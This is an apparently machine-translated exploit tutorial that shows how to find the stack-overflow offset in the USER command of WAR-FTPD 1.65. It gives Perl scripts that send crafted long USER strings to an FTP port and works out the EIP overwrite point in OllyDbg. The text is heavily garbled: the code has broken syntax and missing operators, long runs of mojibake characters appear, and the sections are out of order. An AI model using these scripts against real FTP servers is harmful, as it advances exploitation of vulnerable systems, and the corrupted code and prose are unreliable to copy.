Using 2 overflow positioning overflow points Util 2 overflow positioning overflow points This method is the first time in black defense, the example is the last WAR-FTPD VERSION 1.65 User Vulnerability 1st overflow code: ------ ---------- CODZ-START ------------------ #! / usr / bin / perl us :: socket; $ host = " 127.0.0.1 "; $ port =" 2121 "; MY $ SOCK = IO :: Socket :: inet-> new (proto =>" tcp ", peeraddr => $ host, peerport => $ port) || DIE" Sorry! Could Not Connect To $ Host / N "; Print $ SOCK" User "; # key code for ($ I = 0; $ I <800; $ i ) {$ k = $ I% 10 100; # < == Note here Print $ SOCK CHR ($ K); Print Chr ($ K);} Print $ SOCK "/ N"; Close $ SOCK; -------------- CODZ -END -------------------- Use ollydbg to load the WAR-FTPD and run. C: / usr / bin> buff1.pldefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklmdefghijklm see our submission is a decimal between 100-109 letters are used to determine the d-m the mantissa. Overflow is triggered, the letter corresponding to the EIP is 0x6c6b6a69 is the LKJI machine code arrangement is the reverse existing, so the RET address we coverage is the start letter is I, machine code 0x69. Where the letter from D-M is started with D, the corresponding machine code is 0x64, we can determine that the submission of the BUFF length is: 0x69-0x64 = 5 Start to overwrite RET.
2nd spill code: -------------- CODZ-START ------------------ #! / Usr / bin / perl Use IO :: Socket; $ Host = "127.0.0.1"; $ port = "2121"; MY $ SOCK = IO :: Socket :: inet-> new (proto => "tcp", peeraddr => $ HOST, Peerport => $ port) || DIE "Sorry! Could Not connect to $ host / n"; Print $ SOCK "User"; # key code for ($ I = 0; $ I <800; $ 1) {$ K = $ I / 10 100; # <== Note Here Print $ SOCK CHR ($ K); Print Chr ($ K);} Print $ SOCK "/ N"; Close $ SOCK; ------- ---------- CODZ-End -------------------- Use ollydbg to reload the WAR-FTPD and run. C: / usr / bin> buff1.plddddddddddeeeeeeeeeeffffffffffgggggggggghhhhhhhhhhiiiiiiiiiijjjjjjjjjjkkkkkkkkkkllllllllllmmmmmmmmmmnnnnnnnnnnooooooooooppppppppppqqqqqqqqqqrrrrrrrrrrssssssssssttttttttttuuuuuuuuuuvvvvvvvvvvwwwwwwwwwwxxxxxxxxxxyyyyyyyyyyzzzzzzzzzz {{{{{{{{{{||||||||||}}}}}}}}}} ~~~~~~~~~~ ?????????? 亖亖 亖 亖 亖 倐 倐 倐倐倐倐 倐倐倐倐 剟剟 剟剟 剟剟 剟剟 剟剟 剟剟 剟剟 剟剟嗈嗈 嗈 嗈 嗈 垐 垐 垐 垐 墘 墘 墘 墘 墘 妸 妸 妸 妸 妸 媪 媪 媪 媪 媪 寣 寣 寣 寣 寣 崓 崓 崓 崓 崓 帋 帋 帋 帋 帋 弿 弿 弿 弿 弿 悙 悙 悙 悙悙Joy, Joy, 拻 拻 捂 捂 捂 捂 捂 捂 敂 敂敂敂 敂敂敂 敂敂敂 枛 敂敂敂 暗 枣 暗 枣 枣 枣 枣 枛 枛 敂敂敂 枣 枣 枣 枣 枣 枣 枣 枣 枣 枣 枣 枣 枣洓洓 洓 洓 洓 湝 湝 湝 湝 潩 潩 潩 潩 潩 灋 灋 灋 灋 灋 灋 烟 烟 笺 笺 笺 笺 笺 # # # 笺 笺 笺 い 潩 灋 灋 い い い い # い い い い い い い い い い い 精 精 鞍 鞍 北 北 北 北 北 鞍 北 北 北 北 0 0 0 0 0 0 0 0 0 0 0 0 0 It is to determine that overflows in that segment: 0x94-0x64 = 48, so we can indeed comprehensively overbird, overflow points are: (0x94-0x64) x10 (0x69-0x64) = 485, that is, when we submit the length When the buff is 485, it began to cover the RET. Using 2 points to determine overflow points to determine overflow points to determine overflow prodess / security Angels · Superhei [BST] 2004-11-25 Vulnerability Software: WAR-ftpd version 1.65 debugging software: OLLYDBG program: Perl drain said: Construction USER Resulting in stack overflow. For some questions, please refer to: "Win32 buffer overflow" http://www.ph4nt0m.org/doc/20041101160955.pdf we first imitate FTP login to write a script, and put the submitted USER with AAAA .... It indicates that the number of parameters will be submitted, and the overflow point we have to determine is to see the number of AAA we submitted ..... just override our RET.
----------- Codz Start --------------- #! / usr / bin / perl us :: socket; $ argc = @argv; $ host = "127.0.0.1"; $ port = "2121"; $ EFF = @ argv [0]; $ buff = 'a'X $ effect; my $ sock = io :: socket :: inet-> new (proto = > "TCP", Peeraddr => $ Host, Peerport => $ port) || Die "Sorry! Could Not Connect to $ Host / N"; Print $ SOCK "User $ Buff / N"; Print "USER $ BUFF / N "; Close $ SOCK; ------------- CODZ end ---------------- Below we use 2 points to determine this $ EFF. First use ollydbg to load our WAR-FTPD and run. plC we run: / usr / bin> exp.pl 800USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA when we submitted 800 A, overflow triggered, War-Ftpd case eip is hung 41414141 :).
